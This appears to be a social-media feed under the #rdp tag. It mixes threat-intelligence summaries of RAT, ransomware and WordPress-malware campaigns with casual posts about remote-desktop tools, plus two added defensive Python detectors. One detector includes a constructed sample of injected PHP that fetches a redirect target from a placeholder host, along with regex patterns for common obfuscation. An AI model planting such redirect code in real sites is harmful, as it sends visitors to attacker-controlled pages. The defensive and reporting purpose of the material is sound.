#rdp


KongTuke FileFix Leads to New Interlock RAT Variant

A new and resilient variant of the Interlock ransomware group's remote access trojan (RAT) has been identified. This PHP-based malware, a shift from the previous JavaScript-based NodeSnake, is being used in a widespread campaign associated with the LandUpdate808 (KongTuke) web-inject threat clusters. The campaign begins with compromised websites injected with a hidden script, employing IP filtering to serve the payload. The malware performs automated reconnaissance, establishes command and control through Cloudflare Tunnels, and has various execution capabilities. It uses PowerShell for system profiling and discovery, creates persistence through registry modifications, and leverages RDP for lateral movement. The campaign appears to be opportunistic, targeting multiple industries.

Pulse ID: 687617e3e43c59ce42814c2f
Pulse Link: otx.alienvault.com/pulse/68761
Pulse Author: AlienVault
Created: 2025-07-15 08:57:07

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue - Open Threat Exchange: Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

Stealthy PHP Malware Uses ZIP Archive to Redirect WordPress Visitors

A sophisticated piece of malware was discovered embedded in a WordPress site's core files, specifically in wp-settings.php. The malware uses a ZIP archive to hide malicious code and perform search engine poisoning and unauthorized content injection. It employs dynamic Command and Control server selection, anti-bot mechanisms, and manipulates SEO-related files. The malware's main goals include manipulating search engine rankings, injecting spam content, and performing unauthorized redirects. It uses obfuscation techniques and ZIP archives for code inclusion, making it challenging to detect and remove. Prevention measures include keeping software updated, using reputable sources for themes and plugins, implementing strong credential security, utilizing a Web Application Firewall, and regularly scanning for malware.

Pulse ID: 68750b271ed247073ded7ab1
Pulse Link: otx.alienvault.com/pulse/68750
Pulse Author: AlienVault
Created: 2025-07-14 13:50:30

Be advised, this data is unverified and should be considered preliminary. Always do further verification.


A Hybrid Approach with Data Exfiltration and Encryption

The BlackSuit ransomware group, believed to be a rebrand of Royal ransomware, has emerged as a significant threat to organizations. This sophisticated attack combines data exfiltration and encryption, utilizing tools like Cobalt Strike for command and control, rclone for data exfiltration, and BlackSuit ransomware for file encryption. The group's tactics include lateral movement through RDP, SMB, and PsExec, credential dumping, and deletion of shadow copies. Notably, the ransomware uses a -nomutex flag, allowing multiple concurrent executions. The attack flow involves initial access, lateral movement, data exfiltration, partial encryption, and ransom demands ranging from $1 million to $10 million USD in Bitcoin. This hybrid approach highlights the evolving nature of ransomware threats and the need for robust security measures.

Pulse ID: 687229325abbf82b9f462e99
Pulse Link: otx.alienvault.com/pulse/68722
Pulse Author: AlienVault
Created: 2025-07-12 09:21:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.


Attackers Inject Code into WordPress Theme to Redirect Visitors

An analysis reveals a recent attack vector targeting WordPress themes, specifically injecting malicious code into the footer.php file. The injected code uses a function called r2048 to retrieve a URL from a remote server and redirect visitors. This method is particularly insidious as it's not visible from the WordPress dashboard. The attackers utilize either cURL or file_get_contents to fetch the redirection URL, allowing for dynamic control over the destination based on factors like the user's browser or device. This technique underscores the importance of regular theme and plugin audits, as well as securing FTP and SSH access to prevent unauthorized file modifications.

Pulse ID: 6870b25f2615d0a0d9852b01
Pulse Link: otx.alienvault.com/pulse/6870b
Pulse Author: AlienVault
Created: 2025-07-11 06:42:39

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

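The post above describes injected theme code that fetches a redirect target from a remote host and then sends the visitor there. The following scanner is an added example written for this feed entry; it is not code from the OTX pulse, from WordPress, or from the original analysis. The indicator regexes, the severity rule, the function names and the sample theme files (including the placeholder host 203.0.113.10) are all constructed for the demo.

```python
"""Heuristic scan of WordPress theme/plugin PHP files for injected
remote-fetch-then-redirect code.

Added example for this feed entry, not code from the OTX pulse or from
WordPress. Function names, regexes, thresholds and the sample files
below are all constructed for the demo.
"""
import os
import re

# Indicators, each a compiled regex over PHP source.
# remote_fetch: a literal http(s) URL handed to a fetch function, or libcurl use
REMOTE_FETCH = re.compile(
    r"(?:file_get_contents|fopen)\s*\(\s*['\"]https?://|\bcurl_(?:init|exec)\s*\(")
# redirect: PHP header() emitting a Location header
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:", re.IGNORECASE)
# obfuscation: decoders/evaluators commonly wrapped around injected payloads
OBFUSCATION = re.compile(r"\b(?:base64_decode|eval|gzinflate|str_rot13)\s*\(")


def scan_php_source(path, source):
    """Return a finding dict for one file, or None if nothing suspicious.

    A file is 'high' when it both fetches a remote URL and redirects the
    visitor (the footer.php pattern); a lone redirect or decoder is 'low'
    so it can be reviewed rather than auto-quarantined.
    """
    hits = [name for name, rx in (("remote_fetch", REMOTE_FETCH),
                                  ("redirect", REDIRECT),
                                  ("obfuscation", OBFUSCATION))
            if rx.search(source)]
    if not hits:
        return None
    severity = "high" if {"remote_fetch", "redirect"} <= set(hits) else "low"
    return {"path": path, "indicators": hits, "severity": severity}


def scan_tree(root):
    """Walk a directory and scan every .php file; returns a list of findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    finding = scan_php_source(os.path.relpath(full, root), fh.read())
                if finding:
                    findings.append(finding)
    return findings


# Constructed sample files (path -> contents); not real theme code.
SAMPLES = {
    # Pristine footer: only template calls.
    "themes/clean/footer.php": "<?php wp_footer(); ?>\n</body>\n</html>\n",
    # Local read of a theme asset: file_get_contents without a remote URL, not flagged.
    "themes/clean/functions.php": (
        "<?php\n$css = file_get_contents(get_template_directory() . '/style.css');\n"),
    # Injected footer in the shape the post describes: fetch a URL from a
    # remote host, then redirect the visitor there. Host is a placeholder.
    "themes/injected/footer.php": (
        "<?php\nfunction r2048() {\n"
        "    $u = file_get_contents('http://203.0.113.10/redir');\n"
        "    if ($u) { header('Location: ' . $u); exit; }\n"
        "}\nr2048();\nwp_footer(); ?>\n</body>\n</html>\n"),
}


def scan_samples():
    """Run the scanner over the in-memory samples, sorted by path."""
    out = [scan_php_source(p, s) for p, s in sorted(SAMPLES.items())]
    return [f for f in out if f]


if __name__ == "__main__":
    for f in scan_samples():
        print(f["severity"].upper(), f["path"], ",".join(f["indicators"]))
```

Point `scan_tree()` at `wp-content/` to run it against a real install. The heuristics are deliberately loose: a legitimate plugin that redirects after an HTTP call will also score high, so treat a hit as a review queue, and pair it with a checksum comparison against pristine theme and core files, which catches modifications the pattern match misses.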

Deploying NetSupport RAT via WordPress & ClickFix

A threat actor is using compromised WordPress websites to distribute a malicious version of NetSupport Manager Remote Access Tool (RAT). The attack chain involves phishing campaigns, website compromise, DOM manipulation, and a fake CAPTCHA page. The malware is delivered through a batch file that downloads and executes NetSupport Client files. Post-infection, the attacker uses NetSupport's features for reconnaissance and further exploitation. The attack utilizes various JavaScript files and DOM manipulation techniques to evade detection. Multiple IP addresses and domains associated with the attack infrastructure have been identified, primarily linked to hosting providers in Moldova.

Pulse ID: 6870355e6a5f2386068698a0
Pulse Link: otx.alienvault.com/pulse/68703
Pulse Author: AlienVault
Created: 2025-07-10 21:49:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.


Malicious NetSupport Campaign Exploits WordPress Sites and User Clipboard

Pulse ID: 686c8a881b3707894eedd2b0
Pulse Link: otx.alienvault.com/pulse/686c8
Pulse Author: cryptocti
Created: 2025-07-08 03:03:35

Be advised, this data is unverified and should be considered preliminary. Always do further verification.


Random #WindowsXP tip: if you're connecting to your desktop via #RDP and the regular mouse cursor doesn't appear (but others, like the wait and resize cursors, do), make sure you're using the default cursor theme. Some alternate themes or custom cursors may cause problems with RDP.

Hide Your RDP: Password Spray Leads to RansomHub Deployment

This report details a cyberattack where threat actors gained initial access through a password spray attack on an exposed RDP server. They used Mimikatz and Nirsoft for credential harvesting, and employed living-off-the-land techniques along with tools like Advanced IP Scanner for network discovery. The attackers utilized Rclone for data exfiltration via SFTP and deployed RansomHub ransomware across the network using SMB and remote services. The intrusion lasted six days, culminating in widespread encryption and ransom demands. Key phases included initial access, lateral movement, credential theft, data exfiltration, and ransomware deployment, demonstrating a sophisticated and multi-staged attack methodology.

Pulse ID: 6862dc349ae605bef0998ced
Pulse Link: otx.alienvault.com/pulse/6862d
Pulse Author: AlienVault
Created: 2025-06-30 18:49:24

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

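The intrusion above started with a password spray against an exposed RDP server. The detector below is an added example for this feed entry, not code from the OTX pulse or from the report's authors. It assumes Windows Security events exported one per line as key=value fields (a constructed format, not a real exporter's output); the timestamps, account names and addresses in the sample log are made up.

```python
"""Flag a password spray against an RDP host from Windows Security log lines.

Added example for this feed entry, not code from the OTX pulse or the
original report. Assumes events exported one per line as key=value fields
(a constructed format); every user and address below is made up.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed export. EventID 4625 = failed logon, 4624 = successful logon,
# LogonType 10 = RemoteInteractive (an RDP session). One source tries six
# accounts in seconds and then logs in; another is just a user mistyping.
SAMPLE_LOG = """\
2025-06-30T18:00:01Z EventID=4625 TargetUserName=alice IpAddress=203.0.113.45 LogonType=10 Status=0xC000006D
2025-06-30T18:00:04Z EventID=4625 TargetUserName=bob IpAddress=203.0.113.45 LogonType=10 Status=0xC000006D
2025-06-30T18:00:07Z EventID=4625 TargetUserName=carol IpAddress=203.0.113.45 LogonType=10 Status=0xC000006D
2025-06-30T18:00:10Z EventID=4625 TargetUserName=dave IpAddress=203.0.113.45 LogonType=10 Status=0xC000006D
2025-06-30T18:00:13Z EventID=4625 TargetUserName=erin IpAddress=203.0.113.45 LogonType=10 Status=0xC000006D
2025-06-30T18:00:16Z EventID=4625 TargetUserName=svc_backup IpAddress=203.0.113.45 LogonType=10 Status=0xC000006D
2025-06-30T18:00:19Z EventID=4624 TargetUserName=svc_backup IpAddress=203.0.113.45 LogonType=10
2025-06-30T18:02:30Z EventID=4625 TargetUserName=carol IpAddress=198.51.100.7 LogonType=10 Status=0xC000006A
2025-06-30T18:02:41Z EventID=4625 TargetUserName=carol IpAddress=198.51.100.7 LogonType=10 Status=0xC000006A
2025-06-30T18:02:55Z EventID=4624 TargetUserName=carol IpAddress=198.51.100.7 LogonType=10
2025-06-30T18:03:00Z EventID=4625 TargetUserName=alice IpAddress=10.0.0.5 LogonType=3 Status=0xC000006D
"""


def parse_events(text):
    """Parse key=value lines into dicts with a datetime under 'time'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, *fields = line.split()
        rec = dict(f.split("=", 1) for f in fields)
        rec["time"] = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return {source_ip: {...}} for sources that failed RDP logons against
    at least `min_users` distinct accounts inside `window`.

    A spray is many accounts x few passwords, so the distinct-user count per
    source is the signal, not the raw failure count; a user mistyping their
    own password repeatedly stays below the threshold.
    """
    failures = defaultdict(list)                # ip -> [(time, user), ...]
    for e in events:
        if e["EventID"] == "4625" and e.get("LogonType") == "10":
            failures[e["IpAddress"]].append((e["time"], e["TargetUserName"]))

    alerts = {}
    for ip, attempts in failures.items():
        attempts.sort()
        peak = 0                                # max distinct users in any window
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            peak = max(peak, len(users))
        if peak < min_users:
            continue
        first = attempts[0][0]
        # A successful RDP logon from the same source after the spray began
        # is the "spray leads to access" outcome the report describes.
        success = sorted(
            e["TargetUserName"] for e in events
            if e["EventID"] == "4624" and e["IpAddress"] == ip and e["time"] >= first)
        alerts[ip] = {"distinct_users": peak, "accounts_accessed": success}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_spray(parse_events(SAMPLE_LOG)).items():
        print(f"{ip}: {info['distinct_users']} accounts tried, "
              f"logged in as {info['accounts_accessed'] or 'none'}")
```

Two caveats when running this over real exports: on hosts that enforce Network Level Authentication, failed RDP authentications are commonly recorded with LogonType 3 rather than 10, so the filter must be widened there; and a spray spread over days with one attempt per account per hour will slip under a 10-minute window, so keep a second, much longer window with a lower per-hour rate alongside this one.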

RansomHub's Use of Mimikatz and Network Scanners in RDP-Based Attacks

Pulse ID: 68635069d90cca3f1a2b9ff7
Pulse Link: otx.alienvault.com/pulse/68635
Pulse Author: cryptocti
Created: 2025-07-01 03:05:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.


Fake WordPress Plugin Used to Steal Credit Cards and Credentials

A stealthy and powerful piece of malware is cleverly hiding inside a fake WordPress plugin. This dangerous malware can steal credit card details

Pulse ID: 68618d7efaf70a58dd91c43a
Pulse Link: otx.alienvault.com/pulse/68618
Pulse Author: cryptocti
Created: 2025-06-29 19:01:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.


Black Hat SEO Poisoning Search Engine Results For AI to Distribute Malware

Threat actors are exploiting the popularity of AI tools by using Black Hat SEO techniques to poison search engine rankings for AI-related keywords. These malicious websites redirect users through multiple layers to deliver malware such as Vidar, Lumma, and Legion Loader. The attackers employ sophisticated JavaScript to collect browser data, perform fingerprinting, and evade detection. The malware payloads are often packaged in large installer files to bypass sandboxes. The campaign uses trusted platforms like WordPress and AWS CloudFront to appear legitimate. Victims are lured through high-ranking search results for AI topics, leading to infection chains involving stealer malware and cryptocurrency-stealing browser extensions.

Pulse ID: 685d8317b97608a23bed71ee
Pulse Link: otx.alienvault.com/pulse/685d8
Pulse Author: AlienVault
Created: 2025-06-26 17:27:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AWS #Browser #Cloud

With USB/IP, I can now use my YubiKey remotely via SSH in the same way as if I were sitting in front of my machine. Both in the early boot stage (initrd), unlocking the LUKS-encrypted filesystem, and in the booted system stage, signing git commits and authenticating to GitHub. Great! But what about using FIDO2/WebAuthn via RDP to log in to web services? USB redirection is not supported for xrdp. Are there any workarounds coming up to, for example, redirect WebAuthn from one machine to another?

Seriously, if I was #LinusSebastian of #LinusTechTips I'd literally choose to #donate the cost of a #TeamViewer #subscription to #FLOSS #RemoteDesktop projects like #Dayon instead, and sue TeamViewer into upholding their contract or a full refund with interest as if it were a loan, because clearly they chose to violate that contract on their own terms and initiative!

youtube.com/watch?v=RT1t1JlZug

And yes, Dayon! is awesome and I can fully recommend this as an alternative to TeamViewer, #AnyDesk, etc.

retgal.github.io/Dayon/

  • For any system that needs unattended Remote Access I'd recommend setting up a #VPN or at least a reverse #SSH connection anyway, so one can launch something like Dayon! by just sending a single command and have #RemoteDesktop access on-demand.

So yeah, TeamViewer literally shot themselves in the foot here by deciding to shaft paying customers who were able and willing to pay the absurd prices you asked for for a one-time license.

  • Also, whilst TeamViewer does OFC maintain some infrastructure, most of what they do is basically run a "rendezvous" server to allow two endpoints behind NATs to connect to each other and exchange details to make UPnP-style hole-punching work.

That's traffic in the single-digit megabytes per year and client, as there's not much beyond clients pinging their server and basically doing some simple handshakes.

  • And as Linus said, it's not his problem if they have to keep systems up and running in perpetuity. They offered that deal and now they have to suffer through it! By paying, the obligation is on TeamViewer to make it work and continue to make it work!

Also if I'm on a #LAN why would I want to use TeamViewer and not any #VNC (or god forbid #RDP) server? THE WHOLE POINT OF USING TeamViewer, AnyDesk, etc. IS TO NOT HAVE TO WORRY ABOUT NATs, FIREWALLS AND IP-ADDRESSES AND JUST GET CONNECTED FFS!!!

  • Personally I use #Remmina and Dayon, but that's because Remmina is comfortable even for SSH and can do that as well as RDP & VNC, and Dayon is just the simple option I can walk people through that need #TechSupport #remote|ly for a quick hands-on...

Definitely my recommendation, because it also allows for any use case and doesn't nag one to "buy a license!"

  • So please, someone, let #Linus know about Dayon so he can do a "TeamViewer alternatives" video...

Analysis of a Malicious WordPress Plugin: The Covert Redirector

A malicious WordPress plugin named 'wordpress-player.php' has been discovered, affecting at least 26 websites. The plugin injects a hidden HTML5 video player and establishes a WebSocket connection to a command and control server. It redirects visitors to suspicious websites after 4-5 seconds, avoiding execution for logged-in users. The malware uses a fake 'WordPress Core' author name to evade detection. It impacts website integrity through unauthorized redirects, SEO degradation, and potential security risks to visitors. Mitigation steps include thorough scanning, malware removal, credential resets, software updates, and implementing a Web Application Firewall.

Pulse ID: 68536e4f88b62f5f7d8c4865
Pulse Link: otx.alienvault.com/pulse/68536
Pulse Author: AlienVault
Created: 2025-06-19 01:56:31

Be advised, this data is unverified and should be considered preliminary. Always do further verification.
